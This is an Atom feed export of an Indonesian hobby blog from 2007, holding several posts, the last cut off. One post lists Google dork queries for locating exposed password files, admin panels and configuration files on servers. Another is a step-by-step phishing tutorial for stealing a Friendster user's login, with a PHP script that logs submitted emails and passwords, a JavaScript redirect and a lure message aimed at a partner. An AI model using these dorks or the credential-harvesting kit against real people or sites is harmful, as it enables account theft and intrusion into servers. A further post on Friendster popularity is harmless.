<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-283880325471720442</id><updated>2011-09-28T11:05:55.883-07:00</updated><category term='Yeah...'/><category term='Next Trick'/><title type='text'>Ndhy_Note</title><subtitle type='html'>This My Blog For Have Fun!!!</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://gusriandy.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://gusriandy.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Ndhy_Note Site's</name><uri>http://www.blogger.com/profile/12984169970942636271</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>6</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-283880325471720442.post-587636931261499504</id><published>2007-12-28T01:34:00.000-08:00</published><updated>2007-12-28T01:36:18.936-08:00</updated><title type='text'>Trik Menggunakan Google</title><content type='html'>&lt;p&gt;Kemungkinan ini akan bermanfaat dalam pemcarian di google&lt;/p&gt;  &lt;p&gt;“” Intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang&lt;br /&gt;dimaksud. Sebagai contoh pada pencarian, “intitle:&lt;br /&gt;password admin ” ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata ” password ” sebagai judulnya dengan prioritas utama “admin” .&lt;br /&gt;Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.&lt;br /&gt;” inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.&lt;/p&gt;  &lt;p&gt;Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut.&lt;br /&gt;Sebagai contoh pencarian “allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (”/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.&lt;br /&gt;“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.&lt;br /&gt;Baca Lanjutannya…!!!!!!&lt;br /&gt;“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:&lt;br /&gt;“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org&lt;/p&gt;  &lt;p&gt;“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.&lt;br /&gt;“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:”link:&lt;a href="http://www.nusaku.com/forum/ext.php?ref=http://www.securityfocus.com%E2%80%9D" target="_blank"&gt;www.securityfocus.com”&lt;/a&gt; akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.&lt;br /&gt;“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.&lt;/p&gt;  &lt;p&gt;Sebagai contoh: “related:&lt;a href="http://www.nusaku.com/forum/ext.php?ref=http://www.securityfocus.com%E2%80%9D" target="_blank"&gt;www.securityfocus.com”&lt;/a&gt;, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.&lt;br /&gt;“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :&lt;br /&gt;“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.&lt;br /&gt;Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.&lt;/p&gt;  &lt;p&gt;Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .&lt;br /&gt;Sintaks “Index of ” dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.&lt;/p&gt;  &lt;p&gt;Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.&lt;/p&gt;  &lt;p&gt;Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.&lt;br /&gt;Dibawah ini merupakan beberapa contoh penggunaan sintaks ” indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.&lt;/p&gt;  &lt;p&gt;ex :&lt;br /&gt;Index of /admin&lt;br /&gt;Index of /passwd&lt;br /&gt;Index of /password&lt;br /&gt;Index of /mail&lt;br /&gt;“Index of /” +passwd&lt;br /&gt;“Index of /” +password.txt&lt;br /&gt;“Index of /” +.htaccess&lt;br /&gt;“Index of /secret”&lt;br /&gt;“Index of /confidential”&lt;br /&gt;“Index of /root”&lt;br /&gt;“Index of /cgi-bin”&lt;br /&gt;“Index of /credit-card”&lt;br /&gt;“Index of /logs”&lt;br /&gt;“Index of /config”&lt;br /&gt;“Index of/admin.asp&lt;br /&gt;“Index of/login.asp&lt;/p&gt;  &lt;p&gt;Mencari sistem atau server yang vulnerable menggunakan sintaks “inurl:” atau “allinurl:”&lt;br /&gt;1. Menggunakan sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti “system32″. Terkadang akan didapat akses pada cmd.exe pada direktori “system32″ yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.&lt;/p&gt;  &lt;p&gt;2. Menggunakan “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada “wwwboard Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard Password” dapat dilihat pada site keamanan jaringan seperti &lt;a href="http://www.nusaku.com/forum/ext.php?ref=http://www.securityfocus.com" target="_blank"&gt;http://www.securityfocus.com&lt;/a&gt; atau &lt;a href="http://www.nusaku.com/forum/ext.php?ref=http://www.securitytracker.com" target="_blank"&gt;http://www.securitytracker.com&lt;/a&gt;&lt;/p&gt;  &lt;p&gt;3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.&lt;/p&gt;  &lt;p&gt;4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.&lt;br /&gt;Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :&lt;/p&gt;  &lt;p&gt;Inurl: /cgi-bin/cart32.exe&lt;br /&gt;inurl:admin filetype:txt&lt;br /&gt;inurl:admin filetype:db&lt;br /&gt;inurl:admin filetype:cfg&lt;br /&gt;inurl:mysql filetype:cfg&lt;br /&gt;inurl&lt;!--[if gte vml 1]&gt;&lt;v:shapetype id="_x0000_t75" coordsize="21600,21600" spt="75" preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"&gt;  &lt;v:stroke joinstyle="miter"&gt;  &lt;v:formulas&gt;   &lt;v:f eqn="if lineDrawn pixelLineWidth 0"&gt;   &lt;v:f eqn="sum @0 1 0"&gt;   &lt;v:f eqn="sum 0 0 @1"&gt;   &lt;v:f eqn="prod @2 1 2"&gt;   &lt;v:f eqn="prod @3 21600 pixelWidth"&gt;   &lt;v:f eqn="prod @3 21600 pixelHeight"&gt;   &lt;v:f eqn="sum @0 0 1"&gt;   &lt;v:f eqn="prod @6 1 2"&gt;   &lt;v:f eqn="prod @7 21600 pixelWidth"&gt;   &lt;v:f eqn="sum @8 21600 0"&gt;   &lt;v:f eqn="prod @7 21600 pixelHeight"&gt;   &lt;v:f eqn="sum @10 21600 0"&gt;  &lt;/v:formulas&gt;  &lt;v:path extrusionok="f" gradientshapeok="t" connecttype="rect"&gt;  &lt;o:lock ext="edit" aspectratio="t"&gt; &lt;/v:shapetype&gt;&lt;v:shape id="_x0000_i1025" type="#_x0000_t75" alt="" style="'width:12pt;"&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\saboleh\LOCALS~1\Temp\msohtml1\03\clip_image001.gif" href="http://www.nusaku.com/forum/images/smilies/tongue.gif"&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img src="file:///C:/DOCUME%7E1/saboleh/LOCALS%7E1/Temp/msohtml1/03/clip_image001.gif" shapes="_x0000_i1025" border="0" height="16" width="16" /&gt;&lt;!--[endif]--&gt;asswd filetype:txt&lt;br /&gt;inurl:iisadmin&lt;br /&gt;inurl:auth_user_file.txt&lt;br /&gt;inurl&lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_i1026" type="#_x0000_t75" alt="" style="'width:12pt;height:12pt'"&gt;  &lt;v:imagedata src="file:///C:\DOCUME~1\saboleh\LOCALS~1\Temp\msohtml1\03\clip_image002.gif" href="http://www.nusaku.com/forum/images/smilies/redface.gif"&gt; &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img src="file:///C:/DOCUME%7E1/saboleh/LOCALS%7E1/Temp/msohtml1/03/clip_image002.gif" shapes="_x0000_i1026" border="0" height="16" width="16" /&gt;&lt;!--[endif]--&gt;rders.txt&lt;br /&gt;inurl:”wwwroot/*.”&lt;br /&gt;inurl:adpassword.txt&lt;br /&gt;inurl:webeditor.php&lt;br /&gt;inurl:file_upload.php&lt;br /&gt;inurl:gov filetype:xls “restricted”&lt;br /&gt;index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php&lt;br /&gt;allinurl:/phpinfo.php&lt;br /&gt;allinurl:/privmsg.php&lt;br /&gt;allinurl:/privmsg.php&lt;br /&gt;inurl:cgi-bin/go.cgi?go=*&lt;br /&gt;allinurl:.cgi?page=*.txt&lt;br /&gt;allinurul:/modules/My_eGallery&lt;br /&gt;Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:”&lt;br /&gt;atau “allintitle:””&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/283880325471720442-587636931261499504?l=gusriandy.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://gusriandy.blogspot.com/feeds/587636931261499504/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=283880325471720442&amp;postID=587636931261499504' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/587636931261499504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/587636931261499504'/><link rel='alternate' type='text/html' href='http://gusriandy.blogspot.com/2007/12/trik-menggunakan-google.html' title='Trik Menggunakan Google'/><author><name>Ndhy_Note Site's</name><uri>http://www.blogger.com/profile/12984169970942636271</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-283880325471720442.post-2791755692538065290</id><published>2007-12-28T01:00:00.000-08:00</published><updated>2007-12-28T01:11:22.629-08:00</updated><title type='text'>Penerapan Engineering Untuk Mendapatkan Password Di Friendster</title><content type='html'>&lt;p&gt;Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara meng&lt;strong&gt;hacking password&lt;/strong&gt; &lt;strong&gt;Friendster&lt;/strong&gt; karena banyak teman - teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah &lt;strong&gt;goggling&lt;/strong&gt; sejenak akhirnya saya dapat juga di dalam memori ilmu hack saya.&lt;/p&gt;  &lt;p&gt;&lt;i style=""&gt;nah ini dia selamat membaca.&lt;/i&gt; [&lt;b style=""&gt;Andy&lt;/b&gt;]&lt;!--[if gte vml 1]&gt;&lt;v:shapetype id="_x0000_t75" coordsize="21600,21600" spt="75" preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"&gt;  &lt;v:stroke joinstyle="miter"&gt;  &lt;v:formulas&gt;   &lt;v:f eqn="if lineDrawn pixelLineWidth 0"&gt;   &lt;v:f eqn="sum @0 1 0"&gt;   &lt;v:f eqn="sum 0 0 @1"&gt;   &lt;v:f eqn="prod @2 1 2"&gt;   &lt;v:f eqn="prod @3 21600 pixelWidth"&gt;   &lt;v:f eqn="prod @3 21600 pixelHeight"&gt;   &lt;v:f eqn="sum @0 0 1"&gt;   &lt;v:f eqn="prod @6 1 2"&gt;   &lt;v:f eqn="prod @7 21600 pixelWidth"&gt;   &lt;v:f eqn="sum @8 21600 0"&gt;   &lt;v:f eqn="prod @7 21600 pixelHeight"&gt;   &lt;v:f eqn="sum @10 21600 0"&gt;  &lt;/v:formulas&gt;  &lt;v:path extrusionok="f" gradientshapeok="t" connecttype="rect"&gt;  &lt;o:lock ext="edit" aspectratio="t"&gt; &lt;/v:shapetype&gt;&lt;v:shape id="_x0000_i1025" type="#_x0000_t75" alt=";)" style="'width:24pt;"&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img src="file:///C:/DOCUME%7E1/saboleh/LOCALS%7E1/Temp/msohtml1/01/clip_image001.gif" alt=";)" shapes="_x0000_i1025" height="32" width="32" /&gt;&lt;!--[endif]--&gt;&lt;/p&gt;  &lt;table class="MsoNormalTable" style="width: 100%;" border="0" cellpadding="0" width="100%"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 0.75pt; width: 74%;" width="74%"&gt;&lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;"&gt;      &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;"&gt;   &lt;p class="MsoNormal"&gt;Artikel ini ditujukan bahwa ” Hacking tidak selamanya   menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini   jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. &lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_i1027" type="#_x0000_t75" alt=":P" style="'width:11.25pt;height:11.25pt'"&gt;    &lt;v:imagedata src="file:///C:\DOCUME~1\saboleh\LOCALS~1\Temp\msohtml1\01\clip_image002.gif" href="http://sugoistanley.wordpress.com/wp-includes/images/smilies/icon_razz.gif"&gt;   &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img src="file:///C:/DOCUME%7E1/saboleh/LOCALS%7E1/Temp/msohtml1/01/clip_image002.gif" alt=":P" shapes="_x0000_i1027" border="0" height="15" width="15" /&gt;&lt;!--[endif]--&gt;dll. &lt;/p&gt;   &lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;Artikel   ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social   Engineering….&lt;/p&gt;   &lt;p&gt;Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui   teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON   STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot   ingin meneruskan saya tidak bisa memaksa anda…&lt;/p&gt;   &lt;p&gt;Lanjutt ….&lt;/p&gt;   &lt;p&gt;Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita   hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu.   Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll).   Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya??   cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian   lebih dari doi ama kita ;)) n laen-laen .. &lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_i1028" type="#_x0000_t75" alt=":P" style="'width:11.25pt;height:11.25pt'"&gt;    &lt;v:imagedata src="file:///C:\DOCUME~1\saboleh\LOCALS~1\Temp\msohtml1\01\clip_image002.gif" href="http://sugoistanley.wordpress.com/wp-includes/images/smilies/icon_razz.gif"&gt;   &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img src="file:///C:/DOCUME%7E1/saboleh/LOCALS%7E1/Temp/msohtml1/01/clip_image002.gif" alt=":P" shapes="_x0000_i1028" border="0" height="15" width="15" /&gt;&lt;!--[endif]--&gt;.&lt;/p&gt;   &lt;p&gt;So langsung saja kita menuju acara puncak …&lt;/p&gt;   &lt;p&gt;Pertama-tama yg mesti kita siapin :&lt;/p&gt;   &lt;p&gt;1. Teh manis penghangat malam.&lt;br /&gt;  2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …&lt;br /&gt;  3. Web Hosting yg support PHP. Cari di paman Google banyak..&lt;br /&gt;  4. Upload file index.htm (ada di source).&lt;/p&gt;   &lt;p&gt;5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg   nama link yg dituju pada Form Login.&lt;/p&gt;   &lt;p&gt;&lt;?php&lt;br /&gt;  $email = $_POST[email];&lt;br /&gt;  $password = $_POST[password];&lt;br /&gt;  $fl = fopen(’password.txt’, ‘a’);&lt;br /&gt;  fwrite($fl, “$email . $password \n\n”);&lt;br /&gt;  fclose($fl);&lt;/p&gt;   &lt;p&gt;?&gt;&lt;/p&gt;   &lt;p&gt;&lt;script language="”JavaScript”"&gt;&lt;br /&gt;  window.location=”http://www.friendster.com/index.php”;&lt;br /&gt;  &lt;/script&gt;&lt;/p&gt;   &lt;p&gt;Dan upload file diatas ke www.webyangsupportphp.com&lt;/p&gt;   &lt;p&gt;6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di   atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.&lt;/p&gt;   &lt;p&gt;7. kirim testi dg :&lt;/p&gt;   &lt;p&gt;hai syang .. gimna kabarna, kagen nie .. &lt;img id="”XcodeCommunity”" width="”0″" /&gt;&lt;/p&gt;   &lt;p&gt;nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka   sesuai dg perintah yang berada di JavaScript =&gt; window.location &lt;= yg   disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm .   setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka   adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut   pun sang pacar akan dg rela hati mengisi Form login tipuan.&lt;br /&gt;  Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi   menawarkan jasanya untuk sang pacar tercinta… &lt;!--[if gte vml 1]&gt;&lt;v:shape id="_x0000_i1029" type="#_x0000_t75" alt=":P" style="'width:11.25pt;height:11.25pt'"&gt;    &lt;v:imagedata src="file:///C:\DOCUME~1\saboleh\LOCALS~1\Temp\msohtml1\01\clip_image002.gif" href="http://sugoistanley.wordpress.com/wp-includes/images/smilies/icon_razz.gif"&gt;   &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;img src="file:///C:/DOCUME%7E1/saboleh/LOCALS%7E1/Temp/msohtml1/01/clip_image002.gif" alt=":P" shapes="_x0000_i1029" border="0" height="15" width="15" /&gt;&lt;!--[endif]--&gt;=] :))&lt;/p&gt;   &lt;p&gt;Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ”   OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi   html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H   lebih lanjut) pada form login di index.htm maka pada saat pengiriman data   akan menuju ke http://webyangsupportphp.com/login.php&lt;/p&gt;   &lt;p&gt;Kesimpulan :&lt;/p&gt;   &lt;p&gt;# Hacking tidak selamanya menggunakan ” TOOLS “&lt;br /&gt;  # Kelemahan XSS merupakan bahaya besar&lt;br /&gt;  # Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda   sendiri !!!!&lt;/p&gt;   &lt;p class="MsoNormal" style="margin-bottom: 12pt;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/283880325471720442-2791755692538065290?l=gusriandy.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://gusriandy.blogspot.com/feeds/2791755692538065290/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=283880325471720442&amp;postID=2791755692538065290' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/2791755692538065290'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/2791755692538065290'/><link rel='alternate' type='text/html' href='http://gusriandy.blogspot.com/2007/12/penerapan-engineering-untuk-mendapatkan.html' title='Penerapan Engineering Untuk Mendapatkan Password Di Friendster'/><author><name>Ndhy_Note Site's</name><uri>http://www.blogger.com/profile/12984169970942636271</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-283880325471720442.post-5124793772151850076</id><published>2007-12-27T22:48:00.000-08:00</published><updated>2007-12-27T22:52:03.192-08:00</updated><title type='text'>Trik Menjadi Terkenal Di Friendster</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;&lt;span style="font-family: Arial;"&gt;Andy: ^_^&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;Ini buat para Friendstergenic dan para Friendsterholic yang tergila-gila dengan friendster. Berikut tips petunjuk singkat yang bisa kamu praktekkan untuk menjadi popular dan terkenal di friendster layaknya selebritis. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;[1] Pastikan tampilan profil friendster kamu sangat unik dan menarik. Kamu bisa merancang sendiri tampilannya dengan mengotak-atik kode CSS nya atau kamu bisa gunakan yang sudah jadi dan siap pakai. Kamu bisa liat di Friendster-Layout.com ato buka-buka lagi halaman blog ini. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;[2] Langkah selanjutnya adalah tentang isi profile kamu sendiri. Pastikan kamu menuliskan dengan jelsa, singkat dan dengan kata-kata yang enak didengar serta kata-kata yang gak terlalu formal. Pilih kata yang lebih familiar, juga jangan terlalu banyak menggunakan bahasa gaul. Deskripsikan tentang dirimu dengan jelas agar si pembaca bisa cepat merasa nyaman dan familiar dengan yang punya profile. Ingat jangan terlalu jaim dan sombong. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;[3] Pastikan profile kamu terlihat ringkas, padat tapi simple. Kamu bisa menambahkan beberapa video dari youtube, ato menambahkan slidehow di bagian Now Playing section dengan embed. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;[4] Bagaimana dengan teman alias Friends? haha..oke ini adalah bagian pentingnya dari bisnis perFriendster-an ini. namanya juga Friendster, jadi intinya &lt;st1:state&gt;&lt;st1:place&gt;kan&lt;/st1:place&gt;&lt;/st1:State&gt; semua tentang pertemanan (friendster=Pertemanan). Saat seseorang menambahkan teman baru (invite / add friends) itu berarti seseorang tersebut tertarik. So kalo ada seseorang yang meng-add FSmu sebagai teman (friends)nya berarti orang tersebut memiliki rasa ketertarikan untuk tahu lebih banyak lagi tentang kamu. So jangan lupa setelah melakukan Approve kamu kirimi dia testi/comment mengatakan terimakasih telah di add ato thanks for adding me ato apa kek terserah bagaimana kamu merangkai katanya. Kalo bisa jangan lupa mengucapkan "keep in touch with me" biar mereka (friends) merasa kamu perhatikan. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;[5] Nah saat orang tersebut membalas testimu kembali, berarti itu adalah sebuah awal yang bagus untuk menjalin pertemanan dengannya. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;[6] Yang terpenting jangan sampai kamu acuhkan setiap ada orang yang memberimu testimonial alias comment, langsung balas saat kamu sempat. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;[7] Sebagai penutup jangan bersikap terlalu naif dengan menjadi terlalu sombong atau bahkan terlihat terlalu sengsara (pathetic). Usahakan tetap nice dan cool alias keren. Nah kalo itu semua belum membuat kamu sukses..&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify; text-indent: 36pt;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;i style=""&gt;Hubungin Aq Di Andy_Dn_Angel@Yahoo.Co.Id&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/283880325471720442-5124793772151850076?l=gusriandy.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://gusriandy.blogspot.com/feeds/5124793772151850076/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=283880325471720442&amp;postID=5124793772151850076' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/5124793772151850076'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/283880325471720442/posts/default/5124793772151850076'/><link rel='alternate' type='text/html' href='http://gusriandy.blogspot.com/2007/12/trik-menjadi-terkenal-di-friendster.html' title='Trik Menjadi Terkenal Di Friendster'/><author><name>Ndhy_Note Site's</name><uri>http://www.blogger.com/profile/12984169970942636271</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-283880325471720442.post-4453388067992358471</id><published>2007-12-27T22:38:00.000-08:00</published><updated>2007-12-27T22:45:38.749-08:00</updated><title type='text'>Membuat Flashdisk Aman Dari Autorun-Nya Si-Virus</title><content type='html'>&lt;p class="MsoNormal"&gt;&lt;span style="font-family: Arial;"&gt;Andy: ^_^&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;  